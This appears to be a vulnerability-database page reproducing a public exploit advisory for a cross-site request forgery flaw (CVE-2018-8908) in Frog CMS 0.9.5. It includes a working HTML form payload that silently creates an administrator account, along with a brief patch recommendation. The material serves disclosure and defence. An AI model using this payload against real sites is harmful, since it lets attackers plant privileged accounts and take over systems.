| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) Vulnerability | 2 Apr 201800:00 | – | zdt | |
| CVE-2018-8908 | 31 Mar 201822:29 | – | attackerkb | |
| Frog CMS Cross-Site Request Forgery Vulnerability | 19 Apr 201800:00 | – | cnvd | |
| CVE-2018-8908 | 31 Mar 201822:00 | – | cve | |
| CVE-2018-8908 | 31 Mar 201822:00 | – | cvelist | |
| EUVD-2018-20516 | 7 Oct 202500:30 | – | euvd | |
| Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User) | 2 Apr 201800:00 | – | exploitpack | |
| CVE-2018-8908 | 31 Mar 201822:29 | – | nvd | |
| Frog CMS 0.9.5 Cross Site Request Forgery | 31 Mar 201800:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 31 Mar 201822:29 | – | prion |
# Exploit Title: Cross Site Request Forgery- Frog CMS
# Date: 31-03-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# CVE : CVE-2018-8908
# Category: Webapp CMS
1. Description
The application source code is coded in a way which allows malicious HTML
request to be executed without veryifying source of request.This leads to
arbitary execution with malicous request which will lead to the creation of
a privileged user.
2. Proof of Concept
Visit the application
Visit the Add Users Page.
Craft an html page with all the details for an admin user creation
and host it on a server
Upon the link being clicked by a logged in admin user, immidiately,
another admin user will get created.
Exploit Code:
<html>
<body>
<form action="http://localhost/frog/admin/?/user/add" method="POST">
<input type="hidden" name="user[name]" value="Test_1" />
<input type="hidden" name="user[email]" value="" />
<input type="hidden" name="user[username]" value="test" />
<input type="hidden" name="user[password]" value="test" />
<input type="hidden" name="user[confirm]" value="test" />
<input type="hidden"
name="user_permission[administrator]" value="1" />
<input type="hidden" name="commit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Solution - Fix & Patch: The application code should be configured to
implement anti csrf token to filter malicous HTTP Requests.
4. Public Reference with POC and steps:
http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
Thanks and Regards
SamratData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation